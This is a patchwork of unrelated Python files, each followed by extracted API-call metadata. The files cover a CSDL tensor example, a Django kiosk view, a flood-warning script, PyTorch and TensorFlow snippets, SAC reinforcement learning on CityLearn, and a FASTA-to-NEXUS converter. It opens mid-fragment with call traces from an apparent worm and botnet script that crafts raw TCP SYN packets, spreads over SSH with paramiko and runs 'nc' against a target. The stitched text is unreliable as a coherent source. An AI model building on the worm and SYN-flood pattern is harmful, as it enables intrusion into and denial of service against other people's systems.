"('!BBHHHBBH4s4s', v_ihl, dscp_ecn, total_len, ident, flag_frag,\n ttl, protocol, checksum, src, dst)\n", (9636, 9738), False, 'import struct\n'), ((10267, 10285), 'socket.htons', 'socket.htons', (['(5840)'], {}), '(5840)\n', (10279, 10285), False, 'import socket\n'), ((10374, 10481), 'struct.pack', 'struct.pack', (['"""!HHLLBBHHH"""', 'src_port', 'dest_port', 'seq', 'ack', 'offset_reserved', 'flags', 'window', 'checksum', 'urg'], {}), "('!HHLLBBHHH', src_port, dest_port, seq, ack, offset_reserved,\n flags, window, checksum, urg)\n", (10385, 10481), False, 'import struct\n'), ((10628, 10679), 'struct.pack', 'struct.pack', (['"""!4s4sHH"""', 'src', 'dst', 'protocol', 'tcp_len'], {}), "('!4s4sHH', src, dst, protocol, tcp_len)\n", (10639, 10679), False, 'import struct\n'), ((10743, 10850), 'struct.pack', 'struct.pack', (['"""!HHLLBBHHH"""', 'src_port', 'dest_port', 'seq', 'ack', 'offset_reserved', 'flags', 'window', 'checksum', 'urg'], {}), "('!HHLLBBHHH', src_port, dest_port, seq, ack, offset_reserved,\n flags, window, checksum, urg)\n", (10754, 10850), False, 'import struct\n'), ((11211, 11235), 'socket.inet_aton', 'socket.inet_aton', (['src_ip'], {}), '(src_ip)\n', (11227, 11235), False, 'import socket\n'), ((11266, 11290), 'socket.inet_aton', 'socket.inet_aton', (['target'], {}), '(target)\n', (11282, 11290), False, 'import socket\n'), ((1779, 1803), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (1801, 1803), False, 'import paramiko\n'), ((2844, 2872), 'os.path.abspath', 'os.path.abspath', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (2859, 2872), False, 'import os\n'), ((6536, 6550), 'time.sleep', 'time.sleep', (['(60)'], {}), '(60)\n', (6546, 6550), False, 'import time\n'), ((11453, 11519), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_RAW', 'socket.IPPROTO_RAW'], {}), '(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)\n', (11466, 11519), False, 'import socket\n'), ((8027, 8057), 'threading.Thread', 'threading.Thread', ([], {'target': 'hello'}), '(target=hello)\n', (8043, 8057), False, 'import threading\n'), ((12319, 12343), 'netinfo.get_ip', 'netinfo.get_ip', (['"""enp0s3"""'], {}), "('enp0s3')\n", (12333, 12343), False, 'import netinfo\n'), ((12382, 12417), 'threading.Thread', 'threading.Thread', ([], {'target': 'bot_driver'}), '(target=bot_driver)\n', (12398, 12417), False, 'import threading\n'), ((12430, 12478), 'threading.Thread', 'threading.Thread', ([], {'target': 'worm_driver', 'args': '(ID,)'}), '(target=worm_driver, args=(ID,))\n', (12446, 12478), False, 'import threading\n'), ((4497, 4533), 'os.remove', 'os.remove', (["('/tmp/' + target + '.txt')"], {}), "('/tmp/' + target + '.txt')\n", (4506, 4533), False, 'import os\n'), ((7859, 7907), 'threading.Thread', 'threading.Thread', ([], {'target': 'tcp_syn', 'args': '(target,)'}), '(target=tcp_syn, args=(target,))\n', (7875, 7907), False, 'import threading\n'), ((8372, 8430), 'threading.Thread', 'threading.Thread', ([], {'target': 'process_commands', 'args': '(message,)'}), '(target=process_commands, args=(message,))\n', (8388, 8430), False, 'import threading\n'), ((11896, 11929), 'os.system', 'os.system', (["('nc ' + target + ' 80')"], {}), "('nc ' + target + ' 80')\n", (11905, 11929), False, 'import os\n')]
def example(Simulator): from csdl import Model import csdl import numpy as np class ExampleElementwise(Model): def define(self): m = 2 n = 3 # Shape of the three tensors is (2,3) shape = (m, n) # Creating the values for two tensors val1 = np.array([[1, 5, -8], [10, -3, -5]]) val2 = np.array([[2, 6, 9], [-1, 2, 4]]) # Declaring the two input tensors tensor1 = self.declare_variable('tensor1', val=val1) tensor2 = self.declare_variable('tensor2', val=val2) # Creating the output for matrix multiplication ma = self.register_output('ElementwiseMax', csdl.max(tensor1, tensor2)) assert ma.shape == (2, 3) sim = Simulator(ExampleElementwise()) sim.run() print('tensor1', sim['tensor1'].shape) print(sim['tensor1']) print('tensor2', sim['tensor2'].shape) print(sim['tensor2']) print('ElementwiseMax', sim['ElementwiseMax'].shape) print(sim['ElementwiseMax']) return sim
[ "numpy.array", "csdl.max" ]
[((360, 396), 'numpy.array', 'np.array', (['[[1, 5, -8], [10, -3, -5]]'], {}), '([[1, 5, -8], [10, -3, -5]])\n', (368, 396), True, 'import numpy as np\n'), ((416, 449), 'numpy.array', 'np.array', (['[[2, 6, 9], [-1, 2, 4]]'], {}), '([[2, 6, 9], [-1, 2, 4]])\n', (424, 449), True, 'import numpy as np\n'), ((790, 816), 'csdl.max', 'csdl.max', (['tensor1', 'tensor2'], {}), '(tensor1, tensor2)\n', (798, 816), False, 'import csdl\n')]
from django.views.generic.base import TemplateView from django.shortcuts import get_object_or_404, render from .models import Kiosk from event_kiosk.presentations.models import Slide from django.views.decorators.csrf import csrf_exempt from django.http import JsonResponse import django.utils.timezone as timezone import os import datetime class KioskView(TemplateView): template_name = "kiosk.html" def get_context_data(self, **kwargs): slug = kwargs['name'] kiosk = get_object_or_404(Kiosk, name=slug) context = super(KioskView, self).get_context_data(**kwargs) context['kiosk'] = kiosk.name return context @csrf_exempt def kiosk_data(request, **kwargs): slug = kwargs['name'] kiosk = get_object_or_404(Kiosk, name=slug) currentPresentation = kiosk.presentation # construct the JSON representation of the kiosk for scheduledPresentation in kiosk.kioskpresentationcalendar_set.all(): if scheduledPresentation.endTime > timezone.now() >= scheduledPresentation.startTime: currentPresentation = scheduledPresentation.scheduledPresentation # Clean up past KioskPresentationCalendar (the presentation itself is not deleted) elif timezone.now() > scheduledPresentation.endTime: scheduledPresentation.delete() sections = [] for section in kiosk.sections.all(): sections.append(section.to_json()) slides = [] for slide in currentPresentation.slides.all(): if (slide.type == Slide.EVENT and (timezone.now().date() > slide.event.date or ( timezone.now().date() == slide.event.date and timezone.now().time() > slide.event.endTime ) )): # Clean up past event slides (the event itself is not deleted) slide.delete() else: slides.append(slide.to_json()) # Get header image if exists presentation = { 'headerImage': currentPresentation.headerImage.url if currentPresentation.headerImage else None, 'transitionTime': currentPresentation.transitionTime * 1000, 'pauseTimeOnTouch': currentPresentation.pauseTimeOnTouch * 1000, 'slides': slides, 'displayMenu': currentPresentation.displayMenu, 'displayIndicators': currentPresentation.displayIndicators } kiosk = { 'appVersion': os.environ.get('APP_VERSION'), 'presentation': presentation, 'sections': sections } return JsonResponse(kiosk) def appcache_manifest(request, **kwargs): return render(request, 'appcache.html', content_type="text/cache-manifest; charset=utf-8")
[ "django.shortcuts.render", "django.http.JsonResponse", "django.shortcuts.get_object_or_404", "os.environ.get", "django.utils.timezone.now" ]
[((749, 784), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Kiosk'], {'name': 'slug'}), '(Kiosk, name=slug)\n', (766, 784), False, 'from django.shortcuts import get_object_or_404, render\n'), ((2549, 2568), 'django.http.JsonResponse', 'JsonResponse', (['kiosk'], {}), '(kiosk)\n', (2561, 2568), False, 'from django.http import JsonResponse\n'), ((2623, 2711), 'django.shortcuts.render', 'render', (['request', '"""appcache.html"""'], {'content_type': '"""text/cache-manifest; charset=utf-8"""'}), "(request, 'appcache.html', content_type=\n 'text/cache-manifest; charset=utf-8')\n", (2629, 2711), False, 'from django.shortcuts import get_object_or_404, render\n'), ((496, 531), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Kiosk'], {'name': 'slug'}), '(Kiosk, name=slug)\n', (513, 531), False, 'from django.shortcuts import get_object_or_404, render\n'), ((2433, 2462), 'os.environ.get', 'os.environ.get', (['"""APP_VERSION"""'], {}), "('APP_VERSION')\n", (2447, 2462), False, 'import os\n'), ((1003, 1017), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1015, 1017), True, 'import django.utils.timezone as timezone\n'), ((1236, 1250), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1248, 1250), True, 'import django.utils.timezone as timezone\n'), ((1553, 1567), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1565, 1567), True, 'import django.utils.timezone as timezone\n'), ((1635, 1649), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1647, 1649), True, 'import django.utils.timezone as timezone\n'), ((1701, 1715), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1713, 1715), True, 'import django.utils.timezone as timezone\n')]
# <NAME> 2022 # Task 2B # from floodsystem.flood import stations_level_over_threshold from floodsystem.stationdata import build_station_list, update_water_levels def run(): stations = build_station_list() update_water_levels(stations) stations_over = stations_level_over_threshold(stations,0.8) #defines the list stations_over as any (valid data) station where the recent relative level is over 0.8 print("The stations currently above the tolerance are:") for i in range(len(stations_over)): print((stations_over[i][0]).name, (stations_over[i][0].relative_water_level()))#prints the station name and relative water level if __name__ == "__main__": print("*** Task 2B: CUED Part IA Flood Warning System ***") run()
[ "floodsystem.stationdata.build_station_list", "floodsystem.flood.stations_level_over_threshold", "floodsystem.stationdata.update_water_levels" ]
[((190, 210), 'floodsystem.stationdata.build_station_list', 'build_station_list', ([], {}), '()\n', (208, 210), False, 'from floodsystem.stationdata import build_station_list, update_water_levels\n'), ((215, 244), 'floodsystem.stationdata.update_water_levels', 'update_water_levels', (['stations'], {}), '(stations)\n', (234, 244), False, 'from floodsystem.stationdata import build_station_list, update_water_levels\n'), ((266, 310), 'floodsystem.flood.stations_level_over_threshold', 'stations_level_over_threshold', (['stations', '(0.8)'], {}), '(stations, 0.8)\n', (295, 310), False, 'from floodsystem.flood import stations_level_over_threshold\n')]
""" Test case for the HierarchyWidget """ from tempfile import mkdtemp from pySUMOQt import MainWindow import pysumo import shutil """ Steps: 1. Open pySUMO 2. Open HierarchyWidget 3. Open Merge.kif 4. Type instance into the Relation field 4a. Press Enter 5. Type unitofcurrency into the Node field 5a. Press Enter 6. Type subrelation into the Relation field 6a. Press Enter 7. Collapse all 8. Expand all """ if __name__ == "__main__": tmpdir = mkdtemp() pysumo.CONFIG_PATH = tmpdir MainWindow.main() shutil.rmtree(tmpdir, ignore_errors=True)
[ "pySUMOQt.MainWindow.main", "tempfile.mkdtemp", "shutil.rmtree" ]
[((450, 459), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (457, 459), False, 'from tempfile import mkdtemp\n'), ((496, 513), 'pySUMOQt.MainWindow.main', 'MainWindow.main', ([], {}), '()\n', (511, 513), False, 'from pySUMOQt import MainWindow\n'), ((518, 559), 'shutil.rmtree', 'shutil.rmtree', (['tmpdir'], {'ignore_errors': '(True)'}), '(tmpdir, ignore_errors=True)\n', (531, 559), False, 'import shutil\n')]
import torch import config as c device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") IN_WEIGHTS_FILE = c.BASE_DIRECTORY + "/" + c.FILENAME # Name of the file having weights to be transferred. class Init_weights: """Transfer weights based on specific method.""" def __init__(self): self.weights = torch.load(IN_WEIGHTS_FILE, map_location=torch.device('cpu')) def weight_transfer(self, transfer_method, fc1_shape): """ Parameters: transfer_method (int): Value 0 to 6 for different methods. fc1_shape (): Shape of first hidden layer """ # Architecture changes w = self.weights if transfer_method == 1: print("Weights Loaded for ", transfer_method) w = self.weights['fc2_.weight'].T ind = int(w.shape[0] / fc1_shape) x = torch.mean(w[:ind], dim=0).unsqueeze(1) for i in range(2, fc1_shape + 1): x = torch.cat((x, torch.mean(w[:ind], dim=0).unsqueeze(1)), dim=1) w = x elif transfer_method == 2: print("Weights Loaded for ", transfer_method) w = self.weights['fc2.weight'] w = torch.cat((w, torch.zeros(144, 120).to(device)), dim=1) w = torch.cat((w, torch.zeros(48, 192).to(device)), dim=0) elif transfer_method == 3: print("Weights Loaded for ", transfer_method) w = self.weights['fc2.weight'] w = torch.cat((w, torch.zeros(144, 120).to(device)), dim=1) ind = int(w.shape[0] / fc1_shape) x = torch.mean(w[:ind], dim=0).unsqueeze(1) for i in range(2, fc1_shape + 1): x = torch.cat((x, torch.mean(w[:ind], dim=0).unsqueeze(1)), dim=1) w = x # Information extraction elif transfer_method == 4: print("Weights Loaded for ", transfer_method) w = self.weights['fc3.weight'].T w = torch.cat((w, torch.zeros(w.shape).to(device)), dim=1) elif transfer_method == 5: print("Weights Loaded for ", transfer_method) w = self.weights['fc3.weight'].T w = torch.cat((w, w), dim=1) elif transfer_method == 6: print("Weights Loaded for ", transfer_method) w = self.weights['fc3.weight'] w = repeat(w, [2, 1]).T return w def repeat(t, dims): """ parameters: t (tensor): Original tensor dims: dimensions """ if len(dims) != len(t.shape): raise ValueError("Number of dimensions of tensor should be equal to length of dims") for index, dim in enumerate(dims): repeat_vector = [1] * (len(dims) + 1) repeat_vector[index + 1] = dim new_shape = list(t.shape) new_shape[index] *= dim t = t.unsqueeze(index + 1).repeat(repeat_vector).reshape(new_shape) return t
[ "torch.mean", "torch.cuda.is_available", "torch.zeros", "torch.cat", "torch.device" ]
[((68, 93), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (91, 93), False, 'import torch\n'), ((378, 397), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (390, 397), False, 'import torch\n'), ((886, 912), 'torch.mean', 'torch.mean', (['w[:ind]'], {'dim': '(0)'}), '(w[:ind], dim=0)\n', (896, 912), False, 'import torch\n'), ((1624, 1650), 'torch.mean', 'torch.mean', (['w[:ind]'], {'dim': '(0)'}), '(w[:ind], dim=0)\n', (1634, 1650), False, 'import torch\n'), ((2210, 2234), 'torch.cat', 'torch.cat', (['(w, w)'], {'dim': '(1)'}), '((w, w), dim=1)\n', (2219, 2234), False, 'import torch\n'), ((1006, 1032), 'torch.mean', 'torch.mean', (['w[:ind]'], {'dim': '(0)'}), '(w[:ind], dim=0)\n', (1016, 1032), False, 'import torch\n'), ((1240, 1261), 'torch.zeros', 'torch.zeros', (['(144)', '(120)'], {}), '(144, 120)\n', (1251, 1261), False, 'import torch\n'), ((1312, 1332), 'torch.zeros', 'torch.zeros', (['(48)', '(192)'], {}), '(48, 192)\n', (1323, 1332), False, 'import torch\n'), ((1520, 1541), 'torch.zeros', 'torch.zeros', (['(144)', '(120)'], {}), '(144, 120)\n', (1531, 1541), False, 'import torch\n'), ((1744, 1770), 'torch.mean', 'torch.mean', (['w[:ind]'], {'dim': '(0)'}), '(w[:ind], dim=0)\n', (1754, 1770), False, 'import torch\n'), ((2014, 2034), 'torch.zeros', 'torch.zeros', (['w.shape'], {}), '(w.shape)\n', (2025, 2034), False, 'import torch\n')]
import tensorflow as tf """tf.lbeta(x,name=None) 功能:计算`ln(|Beta(x)|)`,并以最末尺度进行归纳。 最末尺度`z = [z_0,...,z_{K-1}]`,则Beta(z) = \prod_j Gamma(z_j) / Gamma(\sum_j z_j) 输入:x为秩为n+1的张量,可以为'float','double'类型。""" x = tf.constant([[4, 3, 3], [2, 3, 2]], tf.float64) z = tf.lbeta(x) # ln(gamma(4)*gamma(3)*gamma(3)/gamma(4+3+3))=ln(6*2*2/362880)=-9.62377365 # ln(gamma(2)*gamma(3)*gamma(2)/gamma(2+3+2))=ln(2/720)=-5.88610403 sess = tf.Session() print(sess.run(z)) sess.close() # z==>[-9.62377365 -5.88610403] # 这是beta函数的计算法,是以gama函数作为基础的所谓伽马函数即是(n-1)! # 例如:gama(4)=3*2*1=6
[ "tensorflow.Session", "tensorflow.constant", "tensorflow.lbeta" ]
[((215, 262), 'tensorflow.constant', 'tf.constant', (['[[4, 3, 3], [2, 3, 2]]', 'tf.float64'], {}), '([[4, 3, 3], [2, 3, 2]], tf.float64)\n', (226, 262), True, 'import tensorflow as tf\n'), ((267, 278), 'tensorflow.lbeta', 'tf.lbeta', (['x'], {}), '(x)\n', (275, 278), True, 'import tensorflow as tf\n'), ((430, 442), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (440, 442), True, 'import tensorflow as tf\n')]
#!/usr/bin/env python # coding: utf-8 """ Implementation of Soft Actor Critic (SAC) network using PyTorch and Stable Baselines 3. See https://stable-baselines3.readthedocs.io/en/master/modules/sac.html for algorithm details. @author: <NAME> 2020 (<EMAIL>) Project for CityLearn Competition """ import torch import numpy as np import gym from stable_baselines3.sac.policies import MlpPolicy as MlpPolicy_SAC from stable_baselines3 import SAC from stable_baselines3.common.callbacks import BaseCallback from stable_baselines3.common import make_vec_env, results_plotter from stable_baselines3.common.monitor import Monitor from stable_baselines3.common.results_plotter import plot_results from stable_baselines3.common.vec_env.base_vec_env import VecEnv from citylearn import CityLearn from pkg3_utils import available_cpu_count as cpu_cores, SaveOnBestTrainingRewardCallback, TensorboardCallback import matplotlib.pyplot as plt from pathlib import Path import warnings import time, sys, os import pprint as pp from torch.utils.tensorboard import writer # Ignore the float32 bound precision warning warnings.simplefilter("ignore", UserWarning) # Central agent controlling the buildings using the OpenAI Stable Baselines climate_zone = 1 data_path = Path("data/Climate_Zone_"+str(climate_zone)) building_attributes = data_path / 'building_attributes.json' weather_file = data_path / 'weather_data.csv' solar_profile = data_path / 'solar_generation_1kW.csv' building_state_actions = 'buildings_state_action_space.json' building_ids = ['Building_1',"Building_2","Building_3","Building_4","Building_5","Building_6","Building_7","Building_8","Building_9"] # building_ids = ['Building_1', 'Building_2'] objective_function = ['ramping','1-load_factor','average_daily_peak','peak_demand','net_electricity_consumption'] env = CityLearn(data_path, building_attributes, weather_file, solar_profile, building_ids, buildings_states_actions = building_state_actions, cost_function = objective_function, central_agent = True, verbose = 1) # Store the weights and scores in a new directory parent_dir = "alg/sac_{}/".format(time.strftime("%Y%m%d-%H%M%S")) # apprends the timedate os.makedirs(parent_dir, exist_ok=True) # Create log dir log_dir = parent_dir+"monitor" os.makedirs(log_dir, exist_ok=True) # Set the interval and their count interval = 8760 icount = int(sys.argv[1]) if len(sys.argv) > 1 else 10 log_interval = 1 check_interval = 1 # Policy kwargs policy_kwargs = dict( net_arch=[128,128] ) # Make VecEnv + Wrap in Monitor env = Monitor(env, filename=log_dir) callbackBest = SaveOnBestTrainingRewardCallback(check_freq=check_interval*interval, log_dir=log_dir) callbackTB = TensorboardCallback() # Add callbacks to the callback list callbackList = [] useBestCallback = True useTensorboardCallback = True # Not working yet if useBestCallback: callbackList.append(callbackBest) if useTensorboardCallback: callbackList.append(callbackTB) model = SAC(MlpPolicy_SAC, env, verbose=1, learning_rate=0.005, gamma=0.99, tau=3e-4, batch_size=2048, train_freq=25, target_update_interval=25, policy_kwargs=policy_kwargs, learning_starts=interval-1, tensorboard_log=parent_dir+"tensorboard/") print() model.learn(total_timesteps=interval*icount, log_interval=log_interval, tb_log_name="", callback=callbackList) # Summary Writer setup # Writer will output to ./runs/ directory by default writer = writer.SummaryWriter(log_dir=parent_dir+"tensorboard/_1") print("Saving TB to {}".format(parent_dir+"tensorboard/_1")) iteration_step = 0 obs = env.reset() dones = False counter = [] # One episode while dones==False: action, _states = model.predict(obs) obs, rewards, dones, info = env.step(action) counter.append(rewards) # Logging if iteration_step % interval: # Building reward writer.add_scalar("Reward/Buildings", rewards, iteration_step) iteration_step += 1 # Costs writer.add_scalars("Scores", env.cost(), iteration_step) # writer.add_scalar("Scores/ramping", env.cost()['ramping'], iteration_step) # writer.add_scalar("Scores/1-load_factor", env.cost()['1-load_factor'], iteration_step) # writer.add_scalar("Scores/average_daily_peak", env.cost()['average_daily_peak'], iteration_step) # writer.add_scalar("Scores/peak_demand", env.cost()['peak_demand'], iteration_step) # writer.add_scalar("Scores/net_electricity_consumption", env.cost()['net_electricity_consumption'], iteration_step) # writer.add_scalar("Scores/total", env.cost()['total'], iteration_step) env.close() print("\nFinal rewards:") pp.pprint(env.cost()) # Plot the reward graph # plot_results([log_dir], interval*icount, results_plotter.X_TIMESTEPS, "SAC CityLearn") # plt.savefig(log_dir+"/rewards.pdf")
[ "stable_baselines3.SAC", "os.makedirs", "pkg3_utils.TensorboardCallback", "torch.utils.tensorboard.writer.SummaryWriter", "time.strftime", "citylearn.CityLearn", "stable_baselines3.common.monitor.Monitor", "warnings.simplefilter", "torch.utils.tensorboard.writer.add_scalar", "pkg3_utils.SaveOnBestTrainingRewardCallback" ]
[((1104, 1148), 'warnings.simplefilter', 'warnings.simplefilter', (['"""ignore"""', 'UserWarning'], {}), "('ignore', UserWarning)\n", (1125, 1148), False, 'import warnings\n'), ((1823, 2029), 'citylearn.CityLearn', 'CityLearn', (['data_path', 'building_attributes', 'weather_file', 'solar_profile', 'building_ids'], {'buildings_states_actions': 'building_state_actions', 'cost_function': 'objective_function', 'central_agent': '(True)', 'verbose': '(1)'}), '(data_path, building_attributes, weather_file, solar_profile,\n building_ids, buildings_states_actions=building_state_actions,\n cost_function=objective_function, central_agent=True, verbose=1)\n', (1832, 2029), False, 'from citylearn import CityLearn\n'), ((2187, 2225), 'os.makedirs', 'os.makedirs', (['parent_dir'], {'exist_ok': '(True)'}), '(parent_dir, exist_ok=True)\n', (2198, 2225), False, 'import time, sys, os\n'), ((2275, 2310), 'os.makedirs', 'os.makedirs', (['log_dir'], {'exist_ok': '(True)'}), '(log_dir, exist_ok=True)\n', (2286, 2310), False, 'import time, sys, os\n'), ((2557, 2587), 'stable_baselines3.common.monitor.Monitor', 'Monitor', (['env'], {'filename': 'log_dir'}), '(env, filename=log_dir)\n', (2564, 2587), False, 'from stable_baselines3.common.monitor import Monitor\n'), ((2603, 2694), 'pkg3_utils.SaveOnBestTrainingRewardCallback', 'SaveOnBestTrainingRewardCallback', ([], {'check_freq': '(check_interval * interval)', 'log_dir': 'log_dir'}), '(check_freq=check_interval * interval,\n log_dir=log_dir)\n', (2635, 2694), False, 'from pkg3_utils import available_cpu_count as cpu_cores, SaveOnBestTrainingRewardCallback, TensorboardCallback\n'), ((2702, 2723), 'pkg3_utils.TensorboardCallback', 'TensorboardCallback', ([], {}), '()\n', (2721, 2723), False, 'from pkg3_utils import available_cpu_count as cpu_cores, SaveOnBestTrainingRewardCallback, TensorboardCallback\n'), ((2983, 3238), 'stable_baselines3.SAC', 'SAC', (['MlpPolicy_SAC', 'env'], {'verbose': '(1)', 'learning_rate': '(0.005)', 'gamma': '(0.99)', 'tau': '(0.0003)', 'batch_size': '(2048)', 'train_freq': '(25)', 'target_update_interval': '(25)', 'policy_kwargs': 'policy_kwargs', 'learning_starts': '(interval - 1)', 'tensorboard_log': "(parent_dir + 'tensorboard/')"}), "(MlpPolicy_SAC, env, verbose=1, learning_rate=0.005, gamma=0.99, tau=\n 0.0003, batch_size=2048, train_freq=25, target_update_interval=25,\n policy_kwargs=policy_kwargs, learning_starts=interval - 1,\n tensorboard_log=parent_dir + 'tensorboard/')\n", (2986, 3238), False, 'from stable_baselines3 import SAC\n'), ((3429, 3488), 'torch.utils.tensorboard.writer.SummaryWriter', 'writer.SummaryWriter', ([], {'log_dir': "(parent_dir + 'tensorboard/_1')"}), "(log_dir=parent_dir + 'tensorboard/_1')\n", (3449, 3488), False, 'from torch.utils.tensorboard import writer\n'), ((2131, 2161), 'time.strftime', 'time.strftime', (['"""%Y%m%d-%H%M%S"""'], {}), "('%Y%m%d-%H%M%S')\n", (2144, 2161), False, 'import time, sys, os\n'), ((3844, 3906), 'torch.utils.tensorboard.writer.add_scalar', 'writer.add_scalar', (['"""Reward/Buildings"""', 'rewards', 'iteration_step'], {}), "('Reward/Buildings', rewards, iteration_step)\n", (3861, 3906), False, 'from torch.utils.tensorboard import writer\n')]
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Thu Apr 16 13:13:51 2020 this script is made to convert a fastafile to a nexus file to be used in phylonet (MLE_BiMarkers). the script produces 01 encoded sequences in nexus format, by filtering for biallelic markers and selecting 1 ind per taxon to be listed afterwards. """ __author__ = '<NAME>' __mail__ = '<EMAIL>' import os import argparse from Bio import AlignIO from Bio.Align import MultipleSeqAlignment import pandas as pd import random from itertools import chain # produces the final nexus file def nexico(data_frepname, prenex, postnex, rep_alignment, individual, name_len): with open(data_frepname, 'a') as data_f: data_f.write(prenex) for count, seq in enumerate(rep_alignment): eindi = individual[count] rep_seq = [x for i, x in enumerate(seq.seq) if i not in triallelic] bin_seq = ''.join(['1' if rp == st else '0' for rp, st in zip(rep_seq, rep_standard)]) # eispi = ''.join(eidi[0].split('.')).lower() # rewrite the fastafile for PhyloNet as nexus with open(data_frepname, 'a') as data_f: data_f.write(f'{eindi}{" "*int(name_len + 1 - len(eindi))}') data_f.write(f'{bin_seq}\n') ## reference all ind to specific populations/taxa # with open(map_frepname, 'a') as map_f: # if count+1 != len(alignment): # map_f.write(f'{eindi}\t{eispi}\n') # else: # map_f.write(f'{eindi}\t{eispi}') with open(data_frepname, 'a') as data_f: data_f.write(postnex) # number of reticulations RET = 0 # number of runs MAX_NUM_RUN = 20 parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument("-i", action="store", dest="rep_dir", required=True, help="Name of the input fasta file") parser.add_argument('-n', action='store', dest='topo', help='nexus file with topology if given') args = parser.parse_args() BIG_DIR = args.rep_dir TOPO = args.topo # BIG_DIR = '/Users/Thomsn/Desktop/Studium/MEME Programme [current]/Universite de Montpellier [Sem2]/internship_scornavacca_lab/git_lab/phylogenetto/data/real_data/vitis/phylonet/2020_04_vitis_USA_summary_20_reps' os.chdir(BIG_DIR) # TOPO = True rep_list = [diro for diro in os.listdir() if 'rep_' in diro] for repsdir in rep_list: # repsdir = f'{rep}' file_name1 = f'{repsdir}/rep_new_asgnmt.fasta' # change to std file_name2 = f'{repsdir}/rep_new_asgnmt.fasta' for file_name in [file_name1, file_name2]: alignment = AlignIO.read(file_name, 'fasta') spac = [] ind = [] map_str = '' for count, seq in enumerate(alignment): eidi = seq.id.split('\\n')[0].split('|') eindi = ''.join(eidi[1].split('_'))[-10:].lower() eispi = ''.join(''.join(eidi[0].split('.')).split('2')).lower() spac.append(eispi) ind.append(eindi) #for ret in range(max_ret + 1): # if not os.path.exists(repsdir): # os.makedirs(repsdir) print(f'~~~ fasta-file {file_name} was set for max {RET} reticulation in: {repsdir} ~~~\n ') loci_frepname = f'{repsdir}/rep_{file_name.split("_")[-2]}_biallelic_loci.txt' # nexus_file for phylonet-input data_frepname = f'{repsdir}/rep_{file_name.split("_")[-2]}_data_{RET}_ret.nexus' ## map file referecing taxon and ind. # map_frepname = f'{repdir}/pnw_imap.txt' # which loci are mono- or triallelic? triallelic = [] for base_count in range(len(alignment[0].seq)): occ_bases = set(list(alignment[:,base_count])) if len([x for x in occ_bases if x.upper() not in ['A','T','G','C']]) > 0: print('You have bases which are not ATGC. This script does not account for N or -.\ please change the script and rerun!') else: if len(occ_bases) != 2: triallelic.append(base_count) print(f' -> there were {len(triallelic)} mono- or triallelic loci reported. those will be \ removed from the alignment for this replicate. A list of the used loci is stored in: {loci_frepname}') loci_kept = [i for i, _ in enumerate(alignment[0].seq) if i not in triallelic] with open(loci_frepname, 'a') as loci_f: loci_f.write(','.join([str(l) for l in loci_kept])) # first sequence in alignment is by definition standard and will have only 1 in sequence (reference allele) rep_standard = [x for i, x in enumerate(alignment[0].seq) if i not in triallelic] # obtain length of longest ind name name_len = max([len(y) for y in ind]) taxa = list(set(spac)) taxind_postnex = [','.join([ind[i] for i, sp in enumerate(spac) if sp == spe]) for spe in taxa] # defining nexus preambel and phylonet block prenex = f'''#NEXUS\nBegin data;\n\ Dimensions ntax={alignment.__len__()} nchar={len(loci_kept)};\n\ Format datatype=dna symbols="012" missing=? gap=-;\n\ Matrix\n\n''' ret = 0 postnex = f''';End;\n\n\ BEGIN PHYLONET;\n\ MLE_BiMarkers -taxa ({",".join(ind)}) -pseudo -mnr 10 -mr {RET} -tm \ <{"; ".join([f"{t}:{i}" for t, i in zip(taxa, taxind_postnex)])}>;\n\ END;''' # extending postex, if TOPO is given if TOPO: topo_file = f'{repsdir}/rep_{file_name.split("_")[-2]}_topo.nex' with open(topo_file,'r') as tfile: soup = tfile.readlines() for molecules in soup: if '[&U]' in molecules: atom = molecules.split('[&U] ')[-1] postnex = f''';End;\n\n\ BEGIN NETWORKS;\n\ Network net1 = {atom}\ END;\n\n\ BEGIN PHYLONET;\n\ MLE_BiMarkers -taxa ({",".join(ind)}) -pseudo -esptheta -mnr {MAX_NUM_RUN} -mr {RET} -snet (net1) -tm \ <{"; ".join([f"{t}:{i}" for t, i in zip(taxa, taxind_postnex)])}>;\n\ END;''' else: postnex = f''';End;\n\n\ BEGIN PHYLONET;\n\ MLE_BiMarkers -taxa ({",".join(ind)}) -pseudo -mr {RET} -tm \ <{"; ".join([f"{t}:{i}" for t, i in zip(taxa, taxind_postnex)])}>;\n\ END;''' # writing the nexus file nexico(data_frepname, prenex, postnex, alignment, ind, name_len) print(f'~~~ Done! ~~~\n ')
[ "os.chdir", "os.listdir", "Bio.AlignIO.read", "argparse.ArgumentParser" ]
[((1729, 1832), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '__doc__', 'formatter_class': 'argparse.RawDescriptionHelpFormatter'}), '(description=__doc__, formatter_class=argparse.\n RawDescriptionHelpFormatter)\n', (1752, 1832), False, 'import argparse\n'), ((2358, 2375), 'os.chdir', 'os.chdir', (['BIG_DIR'], {}), '(BIG_DIR)\n', (2366, 2375), False, 'import os\n'), ((2422, 2434), 'os.listdir', 'os.listdir', ([], {}), '()\n', (2432, 2434), False, 'import os\n'), ((2688, 2720), 'Bio.AlignIO.read', 'AlignIO.read', (['file_name', '"""fasta"""'], {}), "(file_name, 'fasta')\n", (2700, 2720), False, 'from Bio import AlignIO\n')]
